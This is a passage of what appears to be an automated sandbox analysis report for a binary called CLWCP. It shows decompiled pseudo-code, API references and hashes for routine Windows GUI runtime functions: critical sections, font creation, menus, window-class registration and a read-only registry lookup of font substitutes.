                                  control_flow_graph 651 401a1c-401a3e RtlInitializeCriticalSection 652 401a40-401a45 RtlEnterCriticalSection 651->652 653 401a4a-401a80 call 4013d8 * 3 LocalAlloc 651->653 652->653 660 401ab1-401ac5 653->660 661 401a82 653->661 665 401ad1 660->665 666 401ac7-401acc RtlLeaveCriticalSection 660->666 662 401a87-401a99 661->662 662->662 664 401a9b-401aaa 662->664 664->660 666->665
                                  C-Code - Quality: 68%
                                  			E00401A1C() {
                                  				void* _t11;
                                  				signed int _t13;
                                  				intOrPtr _t19;
                                  				void* _t20;
                                  				intOrPtr _t23;
                                  
                                  				_push(_t23);
                                  				_push("�U ");
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t23;
                                  				_push(0x4705c8);
                                  				L00401368();
                                  				if( *0x470049 != 0) {
                                  					_push(0x4705c8);
                                  					L00401370();
                                  				}
                                  				E004013D8(0x4705e8);
                                  				E004013D8(0x4705f8);
                                  				E004013D8(0x470624);
                                  				_t11 = LocalAlloc(0, 0xff8); // executed
                                  				 *0x470620 = _t11;
                                  				if( *0x470620 != 0) {
                                  					_t13 = 3;
                                  					do {
                                  						_t20 =  *0x470620; // 0x0
                                  						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                  						_t13 = _t13 + 1;
                                  					} while (_t13 != 0x401);
                                  					 *((intOrPtr*)(0x47060c)) = 0x470608;
                                  					 *0x470608 = 0x470608;
                                  					 *0x470614 = 0x470608;
                                  					 *0x4705c0 = 1;
                                  				}
                                  				_pop(_t19);
                                  				 *[fs:eax] = _t19;
                                  				_push(E00401AD9);
                                  				if( *0x470049 != 0) {
                                  					_push(0x4705c8);
                                  					L00401378();
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A32
                                  • RtlEnterCriticalSection.KERNEL32(004705C8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A45
                                  • LocalAlloc.KERNEL32(00000000,00000FF8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A6F
                                  • RtlLeaveCriticalSection.KERNEL32(004705C8,00401AD9,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401ACC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                  • String ID: U
                                  • API String ID: 730355536-412294469
                                  • Opcode ID: 770628684a133dcd58a89cca7823b4e392e29c7d3efb34c4d650fefa6f37cac1
                                  • Instruction ID: ea62dc7227c28dd4ff7ad979da99f98fcac367bad80a53be389a553cf0931291
                                  • Opcode Fuzzy Hash: 770628684a133dcd58a89cca7823b4e392e29c7d3efb34c4d650fefa6f37cac1
                                  • Instruction Fuzzy Hash: 4301C870647740EEF355EB6AA815B293AC0E786704F40807BF409E6AF2C6BC4490CF5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 667 44e4c0-44e514 call 437d5c call 403324 672 44e516-44e522 667->672 673 44e528-44e52d call 43749c 667->673 672->673 675 44e532-44e53c 673->675 676 44e542-44e54c 675->676 677 44e69e-44e6a9 675->677 676->677 680 44e552-44e55c 676->680 678 44e6b5-44e6c0 677->678 679 44e6ab-44e6b0 call 4345a8 677->679 684 44e6c2-44e6c7 call 4345ec 678->684 685 44e6cc-44e6de 678->685 679->678 681 44e5a1-44e5c7 call 44e898 680->681 682 44e55e-44e570 680->682 681->677 696 44e5cd-44e5f8 call 44daa0 call 43b514 681->696 682->681 686 44e572-44e59c call 41d85c MulDiv call 41d864 682->686 684->685 689 44e704-44e72a call 435de4 call 437d64 685->689 690 44e6e0-44e6ff call 44daa0 call 43b514 685->690 686->681 690->689 707 44e61d-44e627 696->707 708 44e5fa-44e617 MulDiv 696->708 709 44e64c-44e656 707->709 710 44e629-44e646 MulDiv 707->710 708->707 709->677 711 44e658-44e698 MulDiv * 2 709->711 710->709 711->677
                                  C-Code - Quality: 89%
                                  			E0044E4C0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr* _v8;
                                  				int _t100;
                                  				int _t102;
                                  				intOrPtr _t119;
                                  				int _t124;
                                  				intOrPtr _t157;
                                  				signed char _t166;
                                  				void* _t168;
                                  				intOrPtr _t185;
                                  				intOrPtr _t197;
                                  				void* _t200;
                                  				void* _t202;
                                  				int _t203;
                                  				intOrPtr _t207;
                                  				void* _t209;
                                  				signed char _t210;
                                  
                                  				_t200 = __edi;
                                  				_t206 = _t207;
                                  				_t202 = __edx;
                                  				_v8 = __eax;
                                  				E00437D5C(_v8);
                                  				_push(_t207);
                                  				_push(0x44e72b);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t207;
                                  				 *(_v8 + 0x280) = 0;
                                  				 *(_v8 + 0x284) = 0;
                                  				 *(_v8 + 0x288) = 0;
                                  				_t168 = 0;
                                  				_t209 = E00403324( *_v8) -  *0x44b178; // 0x44b1c4
                                  				if(_t209 == 0) {
                                  					_t166 =  *0x470661 & 0x000000ff ^ 0x00000001;
                                  					_t210 = _t166;
                                  					 *(_v8 + 0x24c) = _t166;
                                  				}
                                  				E0043749C(_v8, _t168, _t202, _t210); // executed
                                  				if( *(_v8 + 0x274) == 0 ||  *(_v8 + 0x288) <= 0) {
                                  					L14:
                                  					_t100 =  *(_v8 + 0x280);
                                  					_t219 = _t100;
                                  					if(_t100 > 0) {
                                  						E004345A8(_v8, _t100, _t219);
                                  					}
                                  					_t102 =  *(_v8 + 0x284);
                                  					_t220 = _t102;
                                  					if(_t102 > 0) {
                                  						E004345EC(_v8, _t102, _t220);
                                  					}
                                  					 *(_v8 + 0x98) =  *0x44e738 & 0x000000ff;
                                  					_t221 = _t168;
                                  					if(_t168 == 0) {
                                  						E0044DAA0(_v8, 1, 1);
                                  						E0043B514(_v8, 1, 1, _t221);
                                  					}
                                  					E00435DE4(_v8, 0, 0xb03d, 0);
                                  					_pop(_t185);
                                  					 *[fs:eax] = _t185;
                                  					_push(0x44e732);
                                  					return E00437D64(_v8);
                                  				} else {
                                  					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                  						_t197 =  *0x470b44; // 0x0
                                  						if( *(_v8 + 0x274) !=  *((intOrPtr*)(_t197 + 0x40))) {
                                  							_t157 =  *0x470b44; // 0x0
                                  							E0041D864( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041D85C( *((intOrPtr*)(_v8 + 0x68))),  *(_t157 + 0x40),  *(_v8 + 0x274)), _t200, _t206);
                                  						}
                                  					}
                                  					_t119 =  *0x470b44; // 0x0
                                  					 *(_v8 + 0x274) =  *(_t119 + 0x40);
                                  					_t203 = E0044E898(_v8);
                                  					_t124 =  *(_v8 + 0x288);
                                  					_t215 = _t203 - _t124;
                                  					if(_t203 != _t124) {
                                  						_t168 = 1;
                                  						E0044DAA0(_v8, _t124, _t203);
                                  						E0043B514(_v8,  *(_v8 + 0x288), _t203, _t215);
                                  						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                  							 *(_v8 + 0x280) = MulDiv( *(_v8 + 0x280), _t203,  *(_v8 + 0x288));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                  							 *(_v8 + 0x284) = MulDiv( *(_v8 + 0x284), _t203,  *(_v8 + 0x288));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                  							 *(_v8 + 0x212) = MulDiv( *(_v8 + 0x212), _t203,  *(_v8 + 0x288));
                                  							 *(_v8 + 0x216) = MulDiv( *(_v8 + 0x216), _t203,  *(_v8 + 0x288));
                                  						}
                                  					}
                                  					goto L14;
                                  				}
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E593
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E60F
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E63E
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E66D
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E690
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ae2a93f609c8b92079eba273e91d65aceb726c8cb7da1e0ad4459303d86227c
                                  • Instruction ID: 128e5020ed250e527bf5469045c59b60cdbb334c0f5b29dbca18e1ec78d45793
                                  • Opcode Fuzzy Hash: 4ae2a93f609c8b92079eba273e91d65aceb726c8cb7da1e0ad4459303d86227c
                                  • Instruction Fuzzy Hash: CE71B474A01104EFDB40EBA9C689AAEB7F5AF49304F6541F5E908DB362DB34AE409B44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0041D650(void* __eax, void* __ebx, void* __ecx) {
                                  				char _v8;
                                  				signed int _v12;
                                  				struct tagLOGFONTA _v72;
                                  				char _v76;
                                  				char _v80;
                                  				intOrPtr _t84;
                                  				intOrPtr _t88;
                                  				intOrPtr _t94;
                                  				int _t107;
                                  				char* _t109;
                                  				int _t111;
                                  				int _t114;
                                  				void* _t122;
                                  				void* _t131;
                                  				intOrPtr _t142;
                                  				void* _t152;
                                  				void* _t153;
                                  				intOrPtr _t154;
                                  
                                  				_t152 = _t153;
                                  				_t154 = _t153 + 0xffffffb4;
                                  				_v80 = 0;
                                  				_v76 = 0;
                                  				_v8 = 0;
                                  				_t131 = __eax;
                                  				_push(_t152);
                                  				_push(0x41d81a);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t154;
                                  				_v12 =  *((intOrPtr*)(__eax + 0x10));
                                  				if( *((intOrPtr*)(_v12 + 8)) != 0) {
                                  					 *[fs:eax] = 0;
                                  					_push(E0041D821);
                                  					E00404140( &_v80, 2);
                                  					_t73 =  &_v8; // 0x41e740
                                  					return E0040411C(_t73);
                                  				} else {
                                  					_t84 =  *0x4708e4; // 0x20f0ac4
                                  					E0041C984(_t84);
                                  					_push(_t152);
                                  					_push(0x41d7ea);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t154;
                                  					if( *((intOrPtr*)(_v12 + 8)) == 0) {
                                  						_v72.lfHeight =  *(_v12 + 0x14);
                                  						_v72.lfWidth = 0;
                                  						_t94 =  *((intOrPtr*)(_v12 + 0x18));
                                  						_v72.lfEscapement = _t94;
                                  						_v72.lfOrientation = _t94;
                                  						if(( *(_v12 + 0x1d) & 0x00000001) == 0) {
                                  							_v72.lfWeight = 0x190;
                                  						} else {
                                  							_v72.lfWeight = 0x2bc;
                                  						}
                                  						_v72.lfItalic = _v12 & 0xffffff00 | ( *(_v12 + 0x1d) & 0x00000002) != 0x00000000;
                                  						_v72.lfUnderline = _v12 & 0xffffff00 | ( *(_v12 + 0x1d) & 0x00000004) != 0x00000000;
                                  						_v72.lfStrikeOut = _v12 & 0xffffff00 | ( *(_v12 + 0x1d) & 0x00000008) != 0x00000000;
                                  						_v72.lfCharSet =  *(_v12 + 0x1e) & 0x000000ff;
                                  						_t48 =  &_v8; // 0x41e740
                                  						E00404380(_t48, _v12 + 0x1f);
                                  						_t107 = E004043DC("Default");
                                  						_t109 = E004045DC("Default");
                                  						_t50 =  &_v8; // 0x41e740
                                  						_t111 = E004043DC( *_t50);
                                  						_t51 =  &_v8; // 0x41e740
                                  						_t114 = CompareStringA(0x400, 1, E004045DC( *_t51), _t111, _t109, _t107); // executed
                                  						if(_t114 != 2) {
                                  							E00404380( &_v80, _v12 + 0x1f);
                                  							E00408970( &(_v72.lfFaceName), _v80);
                                  						} else {
                                  							E00404380( &_v76, 0x46e433);
                                  							E00408970( &(_v72.lfFaceName), _v76);
                                  						}
                                  						_v72.lfQuality = 0;
                                  						if(_v72.lfOrientation == 0) {
                                  							_v72.lfOutPrecision = 0;
                                  						} else {
                                  							_v72.lfOutPrecision = 7;
                                  						}
                                  						_v72.lfClipPrecision = 0;
                                  						_t122 = E0041D974(_t131) - 1;
                                  						if(_t122 == 0) {
                                  							_v72.lfPitchAndFamily = 2;
                                  						} else {
                                  							if(_t122 == 1) {
                                  								_v72.lfPitchAndFamily = 1;
                                  							} else {
                                  								_v72.lfPitchAndFamily = 0;
                                  							}
                                  						}
                                  						 *((intOrPtr*)(_v12 + 8)) = CreateFontIndirectA( &_v72);
                                  					}
                                  					_pop(_t142);
                                  					 *[fs:eax] = _t142;
                                  					_push(E0041D7F1);
                                  					_t88 =  *0x4708e4; // 0x20f0ac4
                                  					return E0041C990(_t88);
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0041C984: RtlEnterCriticalSection.KERNEL32(020F0B0C,0041DECF), ref: 0041C988
                                  • CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,00000000,0041D7EA,?,00000000,0041D81A,?,?), ref: 0041D74B
                                  • CreateFontIndirectA.GDI32(?), ref: 0041D7C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                  • String ID: @A$Default
                                  • API String ID: 249151401-987323561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0044FB80(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				void* _t41;
                                  				void* _t54;
                                  				void* _t61;
                                  				struct HMENU__* _t64;
                                  				struct HMENU__* _t70;
                                  				intOrPtr _t77;
                                  				void* _t79;
                                  				intOrPtr _t81;
                                  				intOrPtr _t83;
                                  				intOrPtr _t87;
                                  				void* _t92;
                                  				intOrPtr _t98;
                                  				void* _t111;
                                  				intOrPtr _t113;
                                  				void* _t116;
                                  
                                  				_v20 = 0;
                                  				_t113 = __edx;
                                  				_t92 = __eax;
                                  				_push(_t116);
                                  				_push(0x44fd46);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t116 + 0xfffffff0;
                                  				if(__edx == 0) {
                                  					L7:
                                  					_t39 =  *((intOrPtr*)(_t92 + 0x260));
                                  					if( *((intOrPtr*)(_t92 + 0x260)) != 0) {
                                  						E00449164(_t39, 0, 0);
                                  					}
                                  					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                  						_t113 = 0;
                                  					}
                                  					 *((intOrPtr*)(_t92 + 0x260)) = _t113;
                                  					if(_t113 != 0) {
                                  						E00419BB8(_t113, _t92);
                                  					}
                                  					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x241)) == 3) {
                                  						_t41 = E0043BD58(_t92);
                                  						__eflags = _t41;
                                  						if(_t41 != 0) {
                                  							SetMenu(E0043BA58(_t92), 0); // executed
                                  						}
                                  						goto L30;
                                  					} else {
                                  						if( *((char*)( *((intOrPtr*)(_t92 + 0x260)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x247)) == 1) {
                                  							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                  								__eflags =  *((char*)(_t92 + 0x247)) - 1;
                                  								if( *((char*)(_t92 + 0x247)) != 1) {
                                  									_t54 = E0043BD58(_t92);
                                  									__eflags = _t54;
                                  									if(_t54 != 0) {
                                  										SetMenu(E0043BA58(_t92), 0);
                                  									}
                                  								}
                                  								goto L30;
                                  							}
                                  							goto L21;
                                  						} else {
                                  							L21:
                                  							if(E0043BD58(_t92) != 0) {
                                  								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x260)))) + 0x34))();
                                  								_t64 = GetMenu(E0043BA58(_t92));
                                  								_t138 = _t61 - _t64;
                                  								if(_t61 != _t64) {
                                  									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x260)))) + 0x34))();
                                  									SetMenu(E0043BA58(_t92), _t70);
                                  								}
                                  								E00449164(_t113, E0043BA58(_t92), _t138);
                                  							}
                                  							L30:
                                  							if( *((char*)(_t92 + 0x246)) != 0) {
                                  								E00451074(_t92, 1);
                                  							}
                                  							E0044FAB8(_t92);
                                  							_pop(_t98);
                                  							 *[fs:eax] = _t98;
                                  							_push(0x44fd4d);
                                  							return E0040411C( &_v20);
                                  						}
                                  					}
                                  				}
                                  				_t77 =  *0x470b44; // 0x0
                                  				_t79 = E00453B08(_t77) - 1;
                                  				if(_t79 >= 0) {
                                  					_v8 = _t79 + 1;
                                  					_t111 = 0;
                                  					do {
                                  						_t81 =  *0x470b44; // 0x0
                                  						if(_t113 ==  *((intOrPtr*)(E00453AF4(_t81, _t111) + 0x260))) {
                                  							_t83 =  *0x470b44; // 0x0
                                  							if(_t92 != E00453AF4(_t83, _t111)) {
                                  								_v16 =  *((intOrPtr*)(_t113 + 8));
                                  								_v12 = 0xb;
                                  								_t87 =  *0x46fa94; // 0x41b820
                                  								E00405C70(_t87,  &_v20);
                                  								E0040B86C(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                  								E00403B64();
                                  							}
                                  						}
                                  						_t111 = _t111 + 1;
                                  						_t10 =  &_v8;
                                  						 *_t10 = _v8 - 1;
                                  					} while ( *_t10 != 0);
                                  				}
                                  			}

                                  APIs
                                  • GetMenu.USER32(00000000), ref: 0044FCA4
                                  • SetMenu.USER32(00000000,00000000), ref: 0044FCC1
                                  • SetMenu.USER32(00000000,00000000), ref: 0044FCF6
                                  • SetMenu.USER32(00000000,00000000,00000000,0044FD46), ref: 0044FD12
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$LoadString
                                  • String ID:
                                  • API String ID: 3688185913-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0041AC4C(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                  				struct _WNDCLASSA _v44;
                                  				struct HINSTANCE__* _t6;
                                  				CHAR* _t8;
                                  				struct HINSTANCE__* _t9;
                                  				int _t10;
                                  				void* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HWND__* _t15;
                                  				long _t17;
                                  				struct HINSTANCE__* _t19;
                                  				CHAR* _t20;
                                  				struct HWND__* _t22;
                                  				CHAR* _t24;
                                  
                                  				_t6 =  *0x470664; // 0x400000
                                  				 *0x46e3fc = _t6;
                                  				_t8 =  *0x46e410; // 0x41ac3c
                                  				_t9 =  *0x470664; // 0x400000
                                  				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                  				asm("sbb eax, eax");
                                  				_t11 = _t10 + 1;
                                  				if(_t11 == 0 || L004065DC != _v44.lpfnWndProc) {
                                  					if(_t11 != 0) {
                                  						_t19 =  *0x470664; // 0x400000
                                  						_t20 =  *0x46e410; // 0x41ac3c
                                  						UnregisterClassA(_t20, _t19);
                                  					}
                                  					RegisterClassA(0x46e3ec);
                                  				}
                                  				_t13 =  *0x470664; // 0x400000
                                  				_t24 =  *0x46e410; // 0x41ac3c
                                  				_t15 = E00406AC4(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
                                  				_t22 = _t15;
                                  				if(_a6 != 0) {
                                  					_t17 = E0041AB90(_a4, _a8); // executed
                                  					SetWindowLongA(_t22, 0xfffffffc, _t17);
                                  				}
                                  				return _t22;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                  • String ID:
                                  • API String ID: 4025006896-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00424840(void* __ebx, void* __esi, void* __eflags) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				int _t11;
                                  				void* _t20;
                                  				intOrPtr _t35;
                                  				void* _t39;
                                  				void* _t40;
                                  				intOrPtr _t41;
                                  
                                  				_t39 = _t40;
                                  				_t41 = _t40 + 0xfffffef8;
                                  				_v8 = 0;
                                  				_push(_t39);
                                  				_push(0x424923);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t41;
                                  				_t11 =  *0x4708a0; // 0x60
                                  				 *0x46e428 =  ~(MulDiv(8, _t11, 0x48));
                                  				_v12 = E0041B004(1);
                                  				_push(_t39);
                                  				_push(0x4248db);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t41;
                                  				E0041B0A4(_v12, 0x80000002);
                                  				_t20 = E0041B22C(_v12, __ebx, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", __esi); // executed
                                  				_t43 = _t20;
                                  				if(_t20 != 0) {
                                  					E0041B45C(_v12,  &_v8, "MS Shell Dlg 2", _t43);
                                  					E0041B074(_v12);
                                  				}
                                  				_pop(_t35);
                                  				 *[fs:eax] = _t35;
                                  				_push(0x4248e2);
                                  				return E00403398(_v12);
                                  			}











                                  APIs
                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00424866
                                    • Part of subcall function 0041B0A4: RegCloseKey.ADVAPI32(10940000,0041AF80,00000001,0041B022,?,?,0042487E,00000008,00000060,00000048,00000000,00424923), ref: 0041B0B8
                                    • Part of subcall function 0041B22C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B298
                                    • Part of subcall function 0041B074: RegFlushKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B085
                                    • Part of subcall function 0041B074: RegCloseKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B08E
                                  Strings
                                  • MS Shell Dlg 2, xrefs: 004248B0
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 0042489C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Close$FlushOpen
                                  • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
                                  • API String ID: 577849800-1582137206
                                  • Opcode ID: 361d1be615ce033ae6f529f53cc4e3ed7e6fd2b71402227f0fdb964afacfc99b
                                  • Instruction ID: d3ed5a1644a865c585e1387f0a344306d0ea90a7519c76b39116b58d0fda558d
                                  • Opcode Fuzzy Hash: 361d1be615ce033ae6f529f53cc4e3ed7e6fd2b71402227f0fdb964afacfc99b
                                  • Instruction Fuzzy Hash: 0201A174710204AFD700EF79D85299E7BE4EB89704F9244B6F800D7691DB395E41CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E0041B22C(void* __eax, void* __ebx, void* __edx, void* __esi) {
                                  				char _v8;
                                  				char _v9;
                                  				void* _v16;
                                  				char* _t61;
                                  				signed int _t64;
                                  				char* _t67;
                                  				signed int _t70;
                                  				char* _t73;
                                  				signed int _t76;
                                  				signed char _t96;
                                  				intOrPtr _t109;
                                  				void* _t118;
                                  				void* _t121;
                                  
                                  				_v8 = 0;
                                  				_t118 = __eax;
                                  				_push(_t121);
                                  				_push(0x41b3c6);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t121 + 0xfffffff4;
                                  				E004041B4( &_v8, __edx);
                                  				_t96 = E0041AFC8(_v8);
                                  				if(_t96 == 0) {
                                  					E0040467C( &_v8, 1, 1);
                                  				}
                                  				_v16 = 0;
                                  				_t61 = E004045DC(_v8);
                                  				_t64 = RegOpenKeyExA(E0041B0F4(_t118, _t96), _t61, 0, 0x20019,  &_v16); // executed
                                  				_v9 = _t64 == 0;
                                  				if(_v9 == 0) {
                                  					_t67 = E004045DC(_v8);
                                  					_t70 = RegOpenKeyExA(E0041B0F4(_t118, _t96), _t67, 0, 0x20009,  &_v16);
                                  					_v9 = _t70 == 0;
                                  					if(_v9 == 0) {
                                  						_t73 = E004045DC(_v8);
                                  						_t76 = RegOpenKeyExA(E0041B0F4(_t118, _t96), _t73, 0, 1,  &_v16);
                                  						_v9 = _t76 == 0;
                                  						if(_v9 != 0) {
                                  							 *(_t118 + 0x18) = 1;
                                  							if(((_t76 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
                                  								_push( *((intOrPtr*)(_t118 + 0x10)));
                                  								_push(E0041B3E0);
                                  								_push(_v8);
                                  								E0040449C();
                                  							}
                                  							E0041B0D0(_t118, _v8, _v16);
                                  						}
                                  					} else {
                                  						 *(_t118 + 0x18) = 0x20009;
                                  						if(((_t70 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
                                  							_push( *((intOrPtr*)(_t118 + 0x10)));
                                  							_push(E0041B3E0);
                                  							_push(_v8);
                                  							E0040449C();
                                  						}
                                  						E0041B0D0(_t118, _v8, _v16);
                                  					}
                                  				} else {
                                  					 *(_t118 + 0x18) = 0x20019;
                                  					if(((_t64 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
                                  						_push( *((intOrPtr*)(_t118 + 0x10)));
                                  						_push(E0041B3E0);
                                  						_push(_v8);
                                  						E0040449C();
                                  					}
                                  					E0041B0D0(_t118, _v8, _v16);
                                  				}
                                  				_pop(_t109);
                                  				 *[fs:eax] = _t109;
                                  				_push(E0041B3CD);
                                  				return E0040411C( &_v8);
                                  			}
















                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B298
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B303
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 0041B368
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: cc7bb251413e2d7370e4f07b8def1cf3fc546229712c83989b59146fa39c66a7
